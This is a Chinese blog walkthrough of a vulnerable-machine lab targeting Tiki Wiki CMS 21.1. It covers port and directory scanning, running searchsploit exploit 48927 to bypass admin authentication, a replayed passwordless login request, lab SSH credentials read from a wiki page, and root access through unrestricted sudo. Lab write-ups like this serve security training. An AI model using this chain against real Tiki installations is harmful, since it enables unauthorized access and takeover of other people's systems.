Tiki靶机练习

news/2024/10/29 20:07:25/文章来源:https://www.cnblogs.com/hackzz/p/18445965

Scan

先arp-scan -l扫描附件主机ip

nmap -sS -sV -n -T4 -p- 192.168.93.132

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 20:25 CST
Nmap scan report for 192.168.93.132
Host is up (0.0013s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 00:0C:29:3D:07:BF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds

dirsearch扫描靶机ip

[20:44:47] 403 -  279B  - /.ht_wsr.txt                                      
[20:44:47] 403 -  279B  - /.htaccess.bak1                                   
[20:44:47] 403 -  279B  - /.htaccess.orig                                   
[20:44:47] 403 -  279B  - /.htaccess.sample
[20:44:47] 403 -  279B  - /.htaccess_extra                                  
[20:44:47] 403 -  279B  - /.htaccess_sc
[20:44:47] 403 -  279B  - /.htaccessBAK                                     
[20:44:47] 403 -  279B  - /.htaccessOLD
[20:44:47] 403 -  279B  - /.htaccessOLD2                                    
[20:44:47] 403 -  279B  - /.htaccess.save                                   
[20:44:47] 403 -  279B  - /.htaccess_orig
[20:44:47] 403 -  279B  - /.html
[20:44:47] 403 -  279B  - /.htpasswd_test                                   
[20:44:47] 403 -  279B  - /.htpasswds
[20:44:47] 403 -  279B  - /.htm
[20:44:47] 403 -  279B  - /.httr-oauth
[20:44:48] 403 -  279B  - /.php                                             
[20:45:43] 200 -   42B  - /robots.txt                                       
[20:45:45] 403 -  279B  - /server-status                                    
[20:45:45] 403 -  279B  - /server-status/                                   
[20:45:53] 301 -  315B  - /tiki  ->  http://192.168.93.132/tiki/            
[20:45:53] 200 -  526B  - /tiki/doc/stable.version       

访问192.168.93.132/tiki发现是tiki wiki cms初始页面,有登录入口
访问tiki/doc/stable.version,结果是一堆版本,也不知道靶机用的到底是哪个版本的cms

继续扫描192.168.93.132/tiki/ ,发现tiki/changelog.txt,进去发现有版本号21.1
用kali自带工具searchsploit搜索相关漏洞。

img

发现一个Tiki Wiki CMS Groupware 21.1 - Authentication Bypass,正好这个cms是21.1的
查看利用脚本内容searchsploit -m php/webapps/48927.py
运行脚本python 4* <host>
结果

python3 4* 192.168.93.132
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 

提示用bp抓包去掉密码登录

POST /tiki/tiki-login.php HTTP/1.1Host: 192.168.93.132User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 121Origin: http://192.168.93.132Connection: closeReferer: http://192.168.93.132/tiki/tiki-login.phpCookie: PHPSESSID=iecm9rpfmkduvu74nmgd48k2tk; PHPSESSIDCV=04zHn53nqCLMqnyrzYRe7Q%3D%3D; javascript_enabled=y; local_tz=Asia%2FShanghaiUpgrade-Insecure-Requests: 1ticket=izkMYy9ZWrHFDwo7M5oVc2l7rTR7Ys9kjI4dyjy9984&user=admin&pass=w&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

img

在List Page页面的Credentials页面发现silky:Agy8Y7SPJNXQzqA

img

疑似ssh登录密码,尝试登录

img

这个竟然能直接提权了

img

Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen:(ALL : ALL) ALL
这意味着 silky 用户在 ubuntu 系统上具有完整的 sudo 权限,具体解读为:(ALL : ALL) ALL:
第一个 ALL:silky 用户可以以 任何用户身份 运行命令。
第二个 ALL:silky 用户可以在 系统上的任何组 下运行命令。
第三个 ALL:silky 用户可以执行 所有命令。```

vulhub靶机的flag一般在/root目录或/root目录子目录下

img

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/823840.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【计算力学】CST单元格式推导

101CST单元格式推导本文来自博客园,作者:FE-有限元鹰,转载请注明原文链接:https://www.cnblogs.com/aksoam/p/18514294

李辉琦的第二次作业

| 这次作业属于哪个课程 | https://edu.cnblogs.com/campus/zjlg/rjjc | | 这个作业的目标 | | 实现一个命令行文本计数统计程序。能正确统计导入的纯英文txt文本中的字符数,单词数,句子数。| | 姓名-学号 | 李辉琦-2022339920017 | 码云仓库地…

24.10.29

A 记少加一个取地址符怒挂 90pts。 虽然本身也不是正解吧。 先用 A 造个线性姬,然后用这个线性姬把剩下的数变成 B,再用处理好的部分造线性姬,回头处理 A。 上面这个在 \(n\) 较大的时候表现良好,因为用 B 可以造出一个完整的线性基。 上面是没加取地址符挂的 90pts。 (下…

QT creator中cmake管理项目,如何引入外部库(引入Eigen库为例)

在Eigen的官网下载压缩包[点我进入]解压到当前项目的根目录(当然你也可以自己选择目录)在当前项目的CMakeLists.txt任意位置加入这句话include_directories(${CMAKE_SOURCE_DIR}/eigen)这时候就是测试是否引入成功,在main.cpp中加入#include <Eigen/Dense>,鼠标悬停如…

实验二 类和对象

任务1 代码: t.h:1 #pragma once 2 #include<string>3 4 class T {5 public:6 T(int x = 0, int y = 0);7 T(const T& t);8 T(T&& t);9 ~T(); 10 void adjust(int ratio); 11 void display()const; 12 private: 13 int m1, m2…

磁盘服务

STORAGESRV 服务DISK 添加大小均为10G的虚拟磁盘,配置raid-5磁盘。 创建LVM命名为/dev/vg01/lv01,大小为100G,格式化为ext4,挂在到本地目录/webdata,在分区内建立测试空文件disk.txt。 磁盘管理-vdo 在 storagesrv 上新加一块 10G 磁盘; 创建 vdo 磁盘,并开启 vdo 磁盘的…

【RocketMQ】消息的发送过程之 Broker 故障延迟或者容错机制

1 前言 上节我们主要看了下消息生产者的启动以及消息的发送过程,内容比较多,篇幅比较长,有一些细节没看到,比如 Broker 的故障延迟机制,所以这节我们就单独来看一下这块内容。 还有我们要知道的是,这个机制默认是关闭的:// ClientConfig /*** 开启消息发送的客户端容错…

什么是MiL测试

MiL测试,即模型在环(Model in the Loop)测试,是一种在系统开发初期就能进行的软件测试方法。其核心是通过在计算机环境中模拟系统行为,找出可能的问题并进行修改。它的优点是可以在没有硬件的情况下,对软件的功能进行全面的、系统的验证。通过模型的测试,可以在开发初期…

【JumpServer教程】简便添加Windows资产:JumpServer堡垒机使用指南

简介: 本文是JumpServer堡垒机使用指南,介绍了如何在JumpServer中简便添加Windows资产的步骤,包括准备工作、开启Windows远程设置、在JumpServer中配置Windows资产以及授权使用。一、背景在很多时候,还有些传统公司,使用的是windows server服务器,所以对于这类资产如何管…

【算法学习】基环树

基环树 基环树就是类似于在树上加了一条边形成了环,去点环上的一条边后就会变成数,如下图。这是一个 \(n\) 个点 \(n\) 条边的连通图,如果不保证联通,它就会成为基环树森林。 外向树:每个点都只有一条入边,因为向内上。 内向树:每个点都只有一条出边,因为向外少。 怎么…

深度学习入门笔记——DataLoader的使用

如何使用数据集DataSet? 在介绍DataLoader之前,需要先了解数据集DataSet的使用。Pytorch中集成了很多已经处理好的数据集,在pytorch的torchvision、torchtext等模块有一些典型的数据集,可以通过配置来下载使用。 以CIFAR10 数据集为例,文档已经描述的很清晰了,其中要注意…

手机中的计算摄影:超广角畸变校正

广角镜头,甚至超广角镜头已经成为了现在手机的标配,这样的手机能够拍摄出宽广的视角,还能够在合拍时拍下更多的人物。比如最新的iPhone13 Pro就有一颗26mm焦距的广角镜头,还有一颗13mm焦距的超广角镜头。事实上,自2019年起,很多手机摄像头的FOV就已经超过100度了 然而,广…